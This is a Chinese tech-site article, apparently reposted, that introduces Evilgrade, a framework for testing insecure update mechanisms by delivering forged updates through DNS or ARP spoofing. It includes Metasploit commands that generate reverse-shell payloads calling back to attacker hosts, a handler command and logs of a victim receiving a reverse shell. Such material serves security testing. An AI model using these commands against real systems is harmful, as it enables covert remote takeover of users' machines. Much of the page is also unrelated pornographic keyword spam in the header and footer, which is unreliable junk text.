精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

如何使用Evilgrade測試應用程序的升級機制是否安全

安全 數據安全
Evilgrade是一款功能強大的模塊化框架,該框架允許廣大研究人員通過向目標應用程序注入偽造的更新代碼,并利用存在安全問題的更新實現機制來測試目標升級更新功能的安全性。該工具提供了預構建的代理以及支持快速測試的默認工作配置。

關于Evilgrade

Evilgrade是一款功能強大的模塊化框架,該框架允許廣大研究人員通過向目標應用程序注入偽造的更新代碼,并利用存在安全問題的更新實現機制來測試目標升級更新功能的安全性。該工具提供了預構建的代理以及支持快速測試的默認工作配置。除此之外,該工具還擁有自己的WebServer和DNSServer模塊。

工具使用場景

內部場景

1、內部DNS訪問;

2、ARP欺騙;

3、DNS緩存投毒;

4、DHCP欺騙;

5、TCP劫持;

6、Wi-Fi訪問點偽造;

外部場景

1、內部DNS訪問;

2、DNS緩存投毒;

實現的模塊

  • Freerip 3.30
  • Jet photo 4.7.2
  • Teamviewer 5.1.9385
  • ISOpen 4.5.0
  • Istat.
  • Gom 2.1.25.5015
  • Atube catcher 1.0.300
  • Vidbox 7.5
  • Ccleaner 2.30.1130
  • Fcleaner 1.2.9.409
  • Allmynotes 1.26
  • Notepad++ 5.8.2
  • Java 1.6.0_22 winxp/win7
  • aMSN 0.98.3
  • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
  • Mirc 7.14
  • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702)
  • Dap 9.5.0.3
  • Winscp 4.2.9
  • AutoIt Script 3.3.6.1
  • Clamwin 0.96.0.1
  • AppTapp Installer 3.11 (Iphone/Itunes)
  • getjar (facebook.com)
  • Google Analytics Javascript injection
  • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
  • Winamp 5.581
  • TechTracker (cnet) 1.3.1 (Build 55)
  • Nokiasoftware firmware update 2.4.8es
  • Nokia firmware v20.2.011
  • BSplayer 2.53.1034
  • Apt ( < Ubuntu 10.04 LTS)
  • Ubertwitter 4.6 (0.971)
  • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
  • Cpan 1.9402
  • VirtualBox (3.2.8 )
  • Express talk
  • Filezilla
  • Flashget
  • Miranda
  • Orbit
  • Photoscape.
  • Panda Antirootkit
  • Skype
  • Sunbelt
  • Superantispyware
  • Trillian <= 5.0.0.26
  • Adium 1.3.10 (Sparkle Framework)
  • VMware
  • ...

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

git clone https://github.com/infobyte/evilgrade.git

工具使用

下面給出的是工具的幫助信息:

evilgrade>help

Type 'help command' for more detailed help on a command.

Commands:

configure - 配置模塊名稱

exit - 退出程序

help - 輸出工具幫助信息

reload - 重新加載并更新所有模塊

restart - 重啟Web服務器

set - 配置變量

show - 顯示對象信息

start - 開啟Web服務器

status - 獲取Web服務器窗臺

stop - 停止Web服務器

version - 顯示框架版本



Object:

options - 顯示當前模塊的選項

vhosts - 顯示當前模塊的VirtualHosts

modules - 列舉所有可用的模塊

active - 顯示活動模塊

列舉實現的模塊:

evilgrade>show modules



List of modules:

===============



...

...

...



- 63 modules available.

配置指定模塊:

evilgrade>conf sunjava

evilgrade(sunjava)>

開啟服務(DNS服務器和WebServer):

evilgrade>start

evilgrade>

[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...

evilgrade>

[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...



#### Waiting for victims



evilgrade>

[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"

evilgrade>

[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"

evilgrade>

[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"

evilgrade>

[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"

顯示狀態和日志:

evilgrade>show status

Webserver (pid 4134) already running



Users status:

============



.---------------------------------------------------------------------------------------------------------------.

| Client | Module | Status | Md5,Cmd,File |

+----------------+------------------+--------+------------------------------------------------------------------+

| 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" |

'----------------+------------------+--------+------------------------------------------------------------------'

工具高級使用

使用場景一

evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'

在這種情況下,對于每個所需的更新二進制文件,我們都可以使用 "windows/shell_reverse_tcp"這個Payload來生成偽造的更新代碼,同時使用一個反向Shell連接到192.168.233.2:4141。<%OUT%><%OUT>標簽專門來檢測輸出二進制文件的生成位置。

比如說,如果我們運行下列命令:

evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'

那么每當我們收到一個二進制請求時,Evilgrade將編譯該行并執行最終字符串"./generatebin -o /tmp/update(random).exe",然后生成不同的代理。

使用場景二

在Evilgrade外運行:

[team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe

在Evilgrade內運行:

evilgrade(sunjava)>set agent /tmp/reverse-shell.exe

生成好Payload之后,我們將得到多個處理器Handler來監聽之前分配的LHOST:

[team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E

[*] Started reverse handler on 192.168.100.2:4444

[*] Starting the payload handler...

項目地址

Evilgrade:【GitHub傳送門】

參考資料

http://www.faradaysec.com/

責任編輯:武曉燕 來源: FreeBuf.COM??
相關推薦

2022-12-22 08:01:09

Vue測試庫測試

2023-08-11 07:59:15

2022-02-21 14:41:21

APIWeb安全

2011-08-05 09:59:54

2009-07-03 06:57:32

2010-12-27 17:04:07

應用程序版本升級

2009-08-27 11:40:43

ibmdw云計算

2022-06-22 09:00:00

安全編程語言工具

2014-02-19 15:38:42

2013-11-19 15:35:01

2009-12-21 09:54:54

Web應用程序安全測試

2010-08-02 23:20:24

2021-07-20 09:44:34

云原生應用程序安全云安全

2009-07-01 18:24:59

JSP應用程序JMeter

2013-10-31 10:44:54

IDE工具

2012-05-29 10:04:08

2011-02-13 14:36:35

2013-02-18 16:12:55

2023-06-28 07:21:51

KoodousFinAPI密鑰

2009-12-16 15:39:37

Visual Stud
點贊
收藏

51CTO技術棧公眾號

美女流白浆视频| 亚洲综合免费观看高清完整版在线 | 国产大片中文字幕| 日韩av不卡一区| 色综合久久中文综合久久牛| 在线视频精品一区| 丰满大乳国产精品| 日韩av午夜在线观看| 久久777国产线看观看精品| 韩国三级hd两男一女| 国产经典一区| 亚洲综合成人网| 日本一区二区三区视频在线播放| 国产女人爽到高潮a毛片| 国产精品久久久久久模特| 深夜成人在线观看| 香蕉视频黄色在线观看| 亚洲一区二区三区久久久| 精品日本美女福利在线观看| 正在播放一区| 搞黄视频免费在线观看| 国产91丝袜在线播放九色| 国产精品久久久久77777| 日韩精品一区三区| 久久精品免费一区二区三区| 亚洲人成绝费网站色www| 91精品人妻一区二区三区蜜桃2| 日本欧美不卡| 日韩欧美在线看| 国产成人艳妇aa视频在线 | 一区视频在线播放| 欧美午夜精品久久久久免费视| www.久久久久久| 九一久久久久久| 国产精品视频永久免费播放| 日韩免费av片| 亚洲网站在线| 欧美精品一区二区免费| 欧美一区二区三区观看| 一区二区小说| 日韩av中文字幕在线免费观看| 91福利视频免费观看| 亚洲精品一区av| 欧美日韩一二三区| 国产主播中文字幕| 中文字幕在线官网| 福利一区福利二区微拍刺激| 轻点好疼好大好爽视频| 先锋成人av| 亚洲精品日韩综合观看成人91| 一区不卡视频| 免费黄色在线| 亚洲麻豆国产自偷在线| 成人在线免费观看网址| 黄网站在线免费看| 亚洲男女一区二区三区| 日韩精品第1页| 99热国产在线| 一区二区在线观看视频| 黄色小视频大全| 18av在线视频| 亚洲狠狠爱一区二区三区| 国产黄色激情视频| 成人影音在线| 欧美性少妇18aaaa视频| 人妻熟女一二三区夜夜爱| 欧美天堂视频| 欧美日韩激情一区二区三区| 91视频这里只有精品| 91精品麻豆| 精品国产一区久久| 国产精品无码在线| 国产精品一区二区三区av麻 | 久久久免费看片| 欧美成人激情| 色综合视频网站| 国产精品自拍视频一区| 亚洲一区区二区| 国产精品96久久久久久又黄又硬| 中国老头性行为xxxx| 久久99精品国产91久久来源| 91久久精品一区二区别| 欧美视频一二区| 久久久精品国产免费观看同学| 亚洲一卡二卡区| 欧美videosex性欧美黑吊| 精品久久久久久亚洲国产300| 天堂av在线网站| 日本成人手机在线| 亚洲欧美精品一区二区| 国产成人免费在线观看视频| 欧美体内she精视频在线观看| 91国语精品自产拍在线观看性色| 最近免费中文字幕大全免费版视频| 麻豆国产精品视频| 国产精品白丝jk白祙| 国产视频第一页在线观看| 亚洲视频一区二区在线| 日韩a在线播放| 亚洲成人高清| 日韩精品www| 黄色a级片在线观看| 99成人精品| 91精品视频观看| 三级在线观看| 一区二区成人在线| 亚洲不卡视频在线| 加勒比色老久久爱综合网| 中文字幕日韩免费视频| 日韩污视频在线观看| 久久成人久久鬼色| 黑人巨大精品欧美一区二区小视频| jizz视频在线观看| 婷婷中文字幕综合| 四虎1515hh.com| 欧美精品一二| 668精品在线视频| 国产精品乱码一区二区| 久久久精品国产99久久精品芒果| 青青青在线视频播放| 9999在线精品视频| 在线成人中文字幕| 中文在线第一页| 成人深夜视频在线观看| 欧美大片免费播放| 日本久久一区| 在线亚洲欧美视频| 中文字幕免费高清网站| aaa亚洲精品| 成年丰满熟妇午夜免费视频 | 性xxxfreexxxx性欧美| 欧美日韩精品一区二区天天拍小说| 人妻在线日韩免费视频| 黄色日韩在线| 国产精品成人一区二区三区| av在线免费观看网址| 欧美日韩国产首页| 欧日韩不卡视频| 男女激情视频一区| 天堂√在线观看一区二区| 国产精品专区免费| 亚洲免费精彩视频| 日日夜夜狠狠操| 国产午夜精品一区二区| 久久国产色av免费观看| 偷拍视屏一区| 日韩av免费看网站| 视频在线观看你懂的| 欧美日韩一区二区在线| 动漫精品一区二区三区| 久久国产主播| 午夜免费电影一区在线观看| 桃花岛成人影院| 一区二区三区美女xx视频| 99久久久无码国产精品免费蜜柚| 久久影视一区二区| 亚洲色图久久久| 日韩av在线播放网址| 国产美女91呻吟求| 国产精品扒开做爽爽爽的视频| 91超碰这里只有精品国产| 免费在线观看一级片| 国产不卡视频在线观看| 亚洲人精品午夜射精日韩| 欧美色图五月天| 国产99在线|中文| 永久免费av在线| 日韩亚洲欧美一区二区三区| 99免费在线观看| 国产丝袜欧美中文另类| 成年人三级黄色片| 欧美日韩亚洲三区| 久久精品国产精品青草色艺| 亚洲欧美在线成人| 久久精品国产亚洲一区二区| 亚洲国产日韩在线观看| 欧美色videos| 欧美h片在线观看| 床上的激情91.| 国产日韩成人内射视频 | 国产欧美一区二区精品性| 91女神在线观看| 精品91视频| 日韩理论片在线观看| 成人午夜888| 国模私拍一区二区三区| 国产视频精选在线| 欧美mv日韩mv| 国产成人精品一区二区色戒| 亚洲日本护士毛茸茸| 在线天堂www在线国语对白| 奇米影视一区二区三区| www.xxx麻豆| 成人三级视频| 国产久一道中文一区| 六九午夜精品视频| 91高清视频免费| 黄av在线免费观看| 亚洲精品一二区| jizz中国女人| 欧美亚洲动漫精品| 欧美亚洲天堂网| 亚洲人成影院在线观看| 久久无码人妻精品一区二区三区| 另类小说一区二区三区| 欧美日本视频在线观看| 在线中文一区| 日韩欧美在线电影| 日韩欧美ww| 99国精产品一二二线| www.国产精品| 日本中文字幕久久看| 日本一本在线免费福利| 日韩中文字幕在线看| 深夜福利在线看| 日韩精品一区国产麻豆| 一级黄色片在线播放| 一本大道av伊人久久综合| 国产精品成人久久| 一区二区三区在线视频免费| 国产aaaaaaaaa| 久久精品一级爱片| 搡老熟女老女人一区二区| 国产精品亚洲第一| 国产三级精品三级在线| 日本在线不卡视频| 黑人糟蹋人妻hd中文字幕| 亚洲视频精品| 日产精品久久久久久久蜜臀| 国产精品不卡| 亚洲欧洲久久| 奇米影视亚洲| 日韩福利视频| 欧美日韩激情在线一区二区三区| 久久精精品视频| 噜噜噜天天躁狠狠躁夜夜精品| 91高跟黑色丝袜呻吟在线观看| 国产成人久久精品一区二区三区| 国产日韩视频在线观看| 国产成人a视频高清在线观看| 国产ts一区二区| 久久电影tv| 国产精品h片在线播放| 欧美成人精品一区二区男人小说| 欧美一级电影久久| 自拍偷拍欧美视频| 欧美孕妇孕交黑巨大网站| 三级在线看中文字幕完整版| 2020欧美日韩在线视频| 波多视频一区| 91香蕉视频mp4| 亚洲人永久免费| 97人妻精品一区二区三区软件| 欧美日韩综合不卡| 中文字幕人妻互换av久久| 欧美中文字幕亚洲一区二区va在线| 欧美日韩综合一区二区三区| 色先锋aa成人| 中文字幕在线观看国产| 欧美日韩高清一区二区| 国产精品久久久久久久久久久久久久久久久久 | 视频欧美精品| 91在线免费看片| 加勒比久久高清| 日韩经典在线视频| 小小影院久久| 欧美日韩不卡在线视频| 西西裸体人体做爰大胆久久久| 免费裸体美女网站| 国精产品一区一区三区mba桃花| 日本中文字幕在线不卡| 成人av免费在线播放| 性少妇bbw张开| 中文字幕日韩精品一区| 欧美极品视频在线观看| 天天操天天色综合| 中文字幕乱码在线观看| 日韩精品一区二区三区在线 | 国产又粗又黄又爽| 欧美tickling网站挠脚心| 欧美巨乳在线| 久久久精品中文字幕| 国产网站在线| 国产一区二区丝袜高跟鞋图片| 伊人久久大香线蕉av超碰| 日本视频精品一区| 欧美国产三区| 北条麻妃视频在线| 国产成人精品免费| 欧美 日韩 成人| 亚洲一区自拍偷拍| 国产精品第6页| 亚洲成人a**站| av福利在线播放| 久久久久久久久爱| 九九热这里有精品| 精品免费国产| 中文字幕一区二区av| 免费激情视频在线观看| 成人激情校园春色| 久久国产波多野结衣| 色综合咪咪久久| 亚洲精品一区二区三区四区| 在线日韩第一页| 国产污视频在线播放| 91传媒视频免费| 成人三级视频| 成人综合视频在线| 国产精品亚洲综合一区在线观看| jizz中文字幕| 五月激情综合网| 国产情侣自拍小视频| 国产亚洲精品久久久久动| 国产精品蜜臀| 91网免费观看| 婷婷久久国产对白刺激五月99| 日韩视频在线免费看| 国产成人鲁色资源国产91色综| 国产一二三av| 91国产免费看| 三级黄视频在线观看| 久久久中文字幕| 一区二区亚洲视频| 日韩亚洲欧美一区二区| 麻豆中文一区二区| 极品蜜桃臀肥臀-x88av| 色噜噜狠狠色综合欧洲selulu| 人人妻人人玩人人澡人人爽| 欧美大片大片在线播放| 国产剧情一区二区在线观看| 在线观看一区二区三区三州| 青青草成人在线观看| 国产熟女一区二区| 一本大道久久a久久精品综合| 日本一区视频| 人体精品一二三区| 一道在线中文一区二区三区| 日本免费不卡一区二区| 99久久免费视频.com| 91蜜桃视频在线观看| 亚洲精品国偷自产在线99热 | 欧美精品一级| 国产精品二区视频| 亚洲国产日韩综合久久精品| 丰满熟妇人妻中文字幕| 久久久久久九九九| 网友自拍区视频精品| 青青在线视频观看| 欧美国产亚洲另类动漫| 又色又爽又黄无遮挡的免费视频| 中文字幕九色91在线| 四虎国产精品永久在线国在线| 欧洲美女和动交zoz0z| 国产激情偷乱视频一区二区三区| 国产精品老熟女一区二区| 精品噜噜噜噜久久久久久久久试看| 丝袜国产在线| 精品视频免费观看| 日韩精品视频网站| 蜜桃av.com| 精品国产人成亚洲区| 欧美日韩国产观看视频| 欧美午夜精品久久久久免费视| 蜜臀va亚洲va欧美va天堂| 黄色录像二级片| 亚洲第一精品夜夜躁人人爽| 亚洲欧洲美洲av| 亚洲免费久久| 国产精品白丝jk白祙喷水网站| 日本亚洲色大成网站www久久| 亚洲美女www午夜| jizz久久久久久| 福利在线小视频| 99精品在线观看视频| 一区二区三区在线观看av| 色小说视频一区| 91成人噜噜噜在线播放| 青青草原成人网| 综合网在线视频| 天天干,夜夜爽| 国产精品三级在线| 国内激情久久| 免费黄色片网站| 日韩免费电影网站| 在线观看欧美日韩电影| 一本一本a久久| av成人动漫在线观看| 自拍偷拍色综合| 久久久久国产精品一区| 欧美精品第一区| 三大队在线观看| 在线亚洲一区二区| 日日夜夜天天综合入口| 日韩精品国内| 国产91精品一区二区麻豆网站| 懂色av蜜臀av粉嫩av分享吧最新章节| 久久精品在线视频| 亚洲三级精品| 亚洲男人天堂2021| 欧美性受xxxx|